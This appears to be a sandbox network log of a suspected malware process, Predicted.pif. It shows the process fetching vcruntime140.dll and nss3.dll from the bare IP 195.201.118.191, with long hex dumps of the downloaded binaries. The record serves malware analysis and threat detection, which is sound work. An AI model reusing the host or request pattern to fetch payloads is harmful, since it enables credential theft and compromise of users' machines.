2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c Data Ascii: ]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|
2024-08-19 04:06:16 UTC	16384	IN	Data Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49887	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:17 UTC	231	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:18 UTC	259	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:17 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:17 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:18 UTC	16125	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-08-19 04:06:18 UTC	16384	IN	Data Raw: 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;B
2024-08-19 04:06:18 UTC	16384	IN	Data Raw: 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 Data Ascii: EEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt
2024-08-19 04:06:18 UTC	16384	IN	Data Raw: c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-08-19 04:06:18 UTC	15603	IN	Data Raw: 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f Data Ascii: @L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicroso

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49890	195.201.118.191	443	7684	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Timestamp	Bytes transferred	Direction	Data
2024-08-19 04:06:19 UTC	223	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: 195.201.118.191 Connection: Keep-Alive Cache-Control: no-cache
2024-08-19 04:06:19 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 19 Aug 2024 04:06:19 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Monday, 19-Aug-2024 04:06:19 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-08-19 04:06:19 UTC	16123	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MAQ
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-08-19 04:06:19 UTC	16384	IN	Data Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 Data Ascii: 8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$
